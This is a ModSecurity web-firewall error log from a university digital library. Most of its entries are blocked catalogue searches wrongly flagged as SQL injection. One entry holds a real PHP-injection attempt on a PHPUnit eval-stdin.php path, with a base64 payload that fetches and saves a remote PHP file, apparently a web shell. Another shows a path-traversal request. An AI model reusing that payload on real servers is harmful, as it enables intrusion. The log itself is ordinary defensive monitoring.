[Mon Aug 28 19:30:12.460760 2023] [:error] [pid 50732] [client 85.208.96.202] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22ALI, A. FAIDLAL RAHMAN\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZOyTVMCo-f0AAMYsMOIAAAAM"]
[Mon Aug 28 19:32:28.554403 2023] [:error] [pid 50787] [client 85.208.96.196] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22STEINBART, PAUL JOHN.\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZOyT3MCo-f0AAMZjgHQAAAAG"]
[Mon Aug 28 19:39:46.753848 2023] [:error] [pid 50843] [client 66.249.70.198] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22MZ, ZEN ZANIBAR.\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZOyVksCo-f0AAMabXxcAAAAR"]
[Mon Aug 28 19:45:29.870186 2023] [:error] [pid 50854] [client 66.249.70.197] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22BJ, ABDUL MUIS.\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZOyW6cCo-f0AAMamUosAAAAI"]
[Mon Aug 28 19:46:19.028237 2023] [:error] [pid 50784] [client 85.208.96.193] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Martono\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZOyXG8Co-f0AAMZg4RQAAAAQ"]
[Mon Aug 28 19:46:35.626870 2023] [:error] [pid 50787] [client 85.208.96.202] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22UNDANG-UNDANG REPUBLIK INDONESIA NOMOR 15 TAHUN 20\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZOyXK8Co-f0AAMZjgIwAAAAG"]
[Mon Aug 28 19:46:44.986427 2023] [:error] [pid 50978] [client 66.249.70.198] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22TABAH DALAM BENCANA\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZOyXNMCo-f0AAMciLIEAAAAO"]
[Mon Aug 28 19:58:06.203554 2023] [:error] [pid 51254] [client 85.208.96.206] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22SILTONGA, PARLAGUTAN\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZOyZ3sCo-f0AAMg2pLsAAAAJ"]
[Mon Aug 28 19:59:18.092753 2023] [:error] [pid 51240] [client 47.128.16.90] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22EKONOMIKA MIKRO\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZOyaJsCo-f0AAMgoBEsAAAAQ"]
[Mon Aug 28 20:09:46.860999 2023] [:error] [pid 51237] [client 85.208.96.210] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22AL- ANSHARI,  MAHMUD\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZOycmsCo-f0AAMglSdIAAAAF"]
[Mon Aug 28 20:11:11.620386 2023] [:error] [pid 51499] [client 47.128.29.85] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22ENSIKLOPEDI\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZOyc78Co-f0AAMkrzbQAAAAJ"]
[Mon Aug 28 20:12:23.024790 2023] [:error] [pid 51237] [client 103.195.58.21] ModSecurity: Access denied with code 403 (phase 2). Pattern match "<\\\\?(?!xml)" at ARGS_NAMES:<?php eval('?>'.base64_decode('PD9waHAKZnVuY3Rpb24gYWRtaW5lcigkdXJsLCAkaXNpKSB7CgkkZnAgPSBmb3BlbigkaXNpLCAidyIpOwoJJGNoID0gY3VybF9pbml0KCk7CgljdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfVVJMLCAkdXJsKTsKCWN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9CSU5BUllUUkFOU0ZFUiwgdHJ1ZSk7CgljdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsIHRydWUpOwoJY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX1NTTF9WRVJJRllQRUVSLCBmYWxzZSk7CgljdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfRklMRSwgJGZwKTsKCXJldHVybiBjdXJsX2V4ZWMoJGNoKTsKCWN1cmxfY2xvc2UoJGNoKTsKCWZjbG9zZSgkZnApOwoJb2JfZmx1c2goKTsKCWZsdXNoKCk7Cn0KaWYoYWRtaW5lcigiaHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL0xhbmFuZ0FraXJhL09uaUNoYW4vbWFpbi9vb3BzLnBocCIsImF3ZXNhLnBocCIpKSB7CgllY2hvICJMYW5hbmdHYW50ZW5nIjsKfSBlbHNlIHsKCWVjaG8gImZhaWwiOwp9Cj8 ')); ?>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "230"] [id "959151"] [rev "2"] [msg "PHP Injection Attack"] [severity "CRITICAL"] [ver "OWAS [hostname "digilib.unla.ac.id"] [uri "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "ZOydN8Co-f0AAMglSeEAAAAF"]
[Mon Aug 28 20:21:55.936764 2023] [:error] [pid 51604] [client 85.208.96.201] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22HART, DANIEL W.\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZOyfc8Co-f0AAMmU-DoAAAAE"]
[Mon Aug 28 20:27:16.604419 2023] [:error] [pid 51722] [client 85.208.96.199] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22KINSELLA, SHOPIE\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZOygtMCo-f0AAMoKPogAAAAG"]
[Mon Aug 28 20:31:39.804557 2023] [:error] [pid 51784] [client 85.208.96.208] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22BUKU PINTAR APOTEKER\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZOyhu8Co-f0AAMpIn88AAAAP"]
[Mon Aug 28 20:45:36.525334 2023] [:error] [pid 52222] [client 47.128.29.64] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:filename: ../../images/docs/SURAT_PERNYATAAN_20220920_11164820.jpg.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/lib/minigalnano/createthumb.php"] [unique_id "ZOylAMCo-f0AAMv@Hi8AAAAM"]
[Mon Aug 28 20:47:08.456759 2023] [:error] [pid 52192] [client 66.249.70.198] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22FAUZAN, ENCIK MUHAMMAD\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZOylXMCo-f0AAMvgu5EAAAAQ"]
[Mon Aug 28 21:06:36.253384 2023] [:error] [pid 52536] [client 66.249.70.197] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22PELIPUR LARA MEREKA YANG TERTIMPA MUSIBAH\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZOyp7MCo-f0AAM04IuYAAAAG"]
[Mon Aug 28 21:16:10.363747 2023] [:error] [pid 52658] [client 66.249.70.197] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22ITE\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZOysKsCo-f0AAM2yib0AAAAP"]
[Mon Aug 28 21:18:22.916565 2023] [:error] [pid 52656] [client 52.167.144.49] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22PAHMAWATY, YENNY\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZOysrsCo-f0AAM2wTUQAAAAM"]
[Mon Aug 28 21:36:24.813578 2023] [:error] [pid 52873] [client 66.249.70.198] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22MASDUDIN, IVAN\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZOyw6MCo-f0AAM6JZa8AAAAH"]
[Mon Aug 28 21:47:35.682328 2023] [:error] [pid 53094] [client 40.77.167.242] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22PERUNDANG-UNDANGAN TELEMATIKA\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZOyzh8Co-f0AAM9mkc8AAAAO"]
[Mon Aug 28 21:48:31.573926 2023] [:error] [pid 53047] [client 40.77.167.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22ABDUSSALAM\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZOyzv8Co-f0AAM836gwAAAAQ"]
[Mon Aug 28 21:50:10.063842 2023] [:error] [pid 53038] [client 66.249.70.196] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22YAPRI, CALSVIE\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZOy0IsCo-f0AAM8uFuUAAAAN"]
[Mon Aug 28 21:51:28.575244 2023] [:error] [pid 53046] [client 47.128.22.33] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22DAMANHURI, YAHYA\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZOy0cMCo-f0AAM820fUAAAAP"]
[Mon Aug 28 21:59:05.311677 2023] [:error] [pid 53194] [client 40.77.167.132] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22RAHASIA DAGANG\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZOy2OcCo-f0AAM-Kg9QAAAAH"]
[Mon Aug 28 22:22:36.265100 2023] [:error] [pid 53581] [client 47.128.26.119] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22SHIDDIEQY, HASBI ASH\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZOy7vMCo-f0AANFNjcEAAAAQ"]
